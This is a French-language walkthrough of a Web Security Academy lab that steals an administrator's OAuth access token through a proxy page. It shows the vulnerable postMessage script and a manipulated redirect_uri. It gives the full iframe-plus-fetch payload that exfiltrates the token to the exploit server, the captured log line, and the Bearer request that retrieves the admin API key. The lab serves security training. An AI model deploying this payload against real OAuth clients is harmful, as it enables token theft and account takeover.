Vol de jeton d’accès OAuth via une page proxy

Stealing OAuth access tokens via a proxy page

Lab: Stealing OAuth access tokens via a proxy page | Web Security AcademyWebSecAcademy

Objectif du laboratoire

Ce laboratoire met en œuvre un service OAuth permettant l’authentification via un réseau social. Une validation insuffisante côté fournisseur OAuth permet de rediriger le jeton d’accès vers une page arbitraire de l’application cliente.

L’objectif est :

d’identifier une vulnérabilité secondaire dans l’application cliente,
de l’utiliser comme page proxy pour exfiltrer le jeton d’accès OAuth de l’administrateur,
puis d’utiliser ce jeton pour récupérer l’API key de l’admin.

L’administrateur ouvrira tout contenu envoyé depuis le serveur d’exploitation et dispose déjà d’une session OAuth active.

Analyse de l’application cliente

On observe une zone de commentaires sous les articles du blog.

Lors du chargement du formulaire de commentaire, une requête GET est envoyée vers

GET /post/comment/comment-form

Le formulaire est chargé dans une iframe, ce qui est visible dans le code source de la page du post :

<iframe onload='this.height = this.contentWindow.document.body.scrollHeight + "px"' width=100% frameBorder=0 src='/post/comment/comment-form#postId=2'></iframe>

Comportement JavaScript intéressant

Le formulaire embarque un script JavaScript révélateur :

<script>
    parent.postMessage({type: 'onload', data: window.location.href}, '*')
    function submitForm(form, ev) {
        ev.preventDefault();
        const formData = new FormData(document.getElementById("comment-form"));
        const hashParams = new URLSearchParams(window.location.hash.substr(1));
        const o = {};
        formData.forEach((v, k) => o[k] = v);
        hashParams.forEach((v, k) => o[k] = v);
        parent.postMessage({type: 'oncomment', content: o}, '*');
        form.reset();
    }
</script>

Points clés :

Le script lit le fragment URL (#).
Il envoie son contenu à la page parente via postMessage.
Cela permet de faire remonter un jeton OAuth présent dans le fragment.

Le formulaire de commentaire peut donc servir de page proxy.

Exploitation via OAuth (flux implicite)

On modifie la redirection OAuth pour pointer vers le formulaire de commentaire :

/../post/comment/comment-form

Exemple de requête OAuth manipulée :

GET /auth?client_id=bovgn6pnqo8u6y8pbvfsg&redirect_uri=https://0af800750488e51e80e41cce000900fd.web-security-academy.net/oauth-callback../post/comment/comment-form&response_type=token&nonce=-1640208972&scope=openid%20profile%20email

Après authentification, le serveur OAuth redirige vers :

/post/comment/comment-form#access_token=ykNiftpsUeqLcCU-YsLcTQV40mETdrpdDeEIn8TpxFU

Le jeton est donc exposé dans le fragment URL, puis transmis au parent via postMessage.

Payload envoyé à la victime

Depuis le serveur d’exploitation, on envoie le contenu suivant :

<iframe src="https://oauth-0a65002f03f8a82f809a152b022a0086.oauth-server.net/auth?client_id=ie5f3rgr0m9qqnl0phsts&redirect_uri=https://0a8100e3034ba84780b9171a008800f5.web-security-academy.net/oauth-callback/../post/comment/comment-form&response_type=token&nonce=-191514846&scope=openid%20profile%20email">
</iframe>

<script>
window.addEventListener('message', function(e) {
  fetch("/" + encodeURIComponent(e.data.data));
})
</script>

Fonctionnement :

L’iframe déclenche le flux OAuth implicite.
Le jeton est injecté dans le fragment URL.
Le formulaire de commentaire l’envoie via postMessage.
Le script le capture et l’exfiltre vers le serveur d’exploitation.

Récupération du jeton

Dans les logs du serveur d’exploitation, on observe :

10.0.3.168      2026-01-02 20:09:43 +0000 "GET /https%3A%2F%2F0a8100e3034ba84780b9171a008800f5.web-security-academy.net%2Fpost%2Fcomment%2Fcomment-form%23access_token%3D0PVBpvJwVQWGtaF7uKFUxCNLayxgK5pbFrUPdEwZ5Qn%26expires_in%3D3600%26token_type%3DBearer%26scope%3Dopenid%2520profile%2520email HTTP/1.1" 404 "user-agent: Mozilla/5.0 (Victim) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36"

Après décodage URL, le jeton est :

0PVBpvJwVQWGtaF7uKFUxCNLayxgK5pbFrUPdEwZ5Qn

Accès à l’API avec le jeton volé

On utilise le jeton pour appeler l’endpoint /me du fournisseur OAuth

GET /me HTTP/2

Host: oauth-0a65002f03f8a82f809a152b022a0086.oauth-server.net

Authorization: Bearer 0PVBpvJwVQWGtaF7uKFUxCNLayxgK5pbFrUPdEwZ5Qn

Content-Type: application/json

Réponse

{
        "sub":"administrator",
        "apikey":"yQ9EksfkSsCZbuivwJ4VLCnR9rrRmH5r",
        "name":"Administrator",
        "email":"[email protected]",
        "email_verified":true
}

Résultat

Le jeton OAuth de l’administrateur a été volé.
L’API key administrateur a été récupérée.
Le laboratoire est validé avec succès.

Mis à jour il y a 1 mois

hashtagStealing OAuth access tokens via a proxy page

Stealing OAuth access tokens via a proxy page